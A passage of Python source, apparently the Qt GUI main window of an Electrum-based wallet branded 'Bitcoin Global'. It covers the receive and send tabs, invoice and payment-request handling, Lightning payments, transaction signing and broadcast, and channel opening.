if selected_path and directory != os.path.dirname(selected_path):
self.config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
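# Keeps a BTC amount field and its fiat counterpart in sync: editing one
# recomputes the other from the current exchange rate. The per-widget
# 'follows' flag guards against feedback loops, because the programmatic
# setText/setAmount calls below re-trigger textChanged on the peer widget.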
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin Global addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('Request'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('On-chain'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
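# Clicking the QR widget opens/closes the detachable QR window; the cursor
# change on hover hints that the widget is clickable.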
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
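# If the user has configured an alias (e.g. OpenAlias) that resolves to an
# address belonging to this wallet, sign the payment request with that
# address's key; this may require unlocking the wallet first.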
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
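# Builds a payment request from the receive-tab fields: a lightning invoice
# when is_lightning is True, otherwise an on-chain request tied to a wallet
# address. The new request is selected in the request list and its invoice
# (lightning) or address (on-chain) is copied to the clipboard.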
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin Global address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs) as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
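# @protected prompts for the wallet password (when keystore encryption is
# enabled) and passes it to the wrapped method as the trailing 'password'
# argument; see the decorated methods below (sign_tx, show_seed_dialog, ...).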
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Global Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_msat=amount_msat, attempts=attempts)
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, key):
req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_clear()
self.do_pay_invoice(invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
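# Coin selection for spends: manually selected coins (coin control) take
# precedence; otherwise all spendable coins are used. nonlocal_only appears to
# exclude outputs of local (not yet broadcast) transactions, e.g. when funding a channel.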
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def pay_onchain_dialog(self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
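# '!' is the spend-max sentinel (type "!" as the amount to send all coins);
# at most one output may spend the maximum.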
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
self.show_message(_('Not Enough Funds'))
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
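# Returns a make_tx closure that (re)builds the channel funding transaction
# for a given fee estimate, so the confirm dialog can rebuild it whenever the
# user changes the fee.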
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
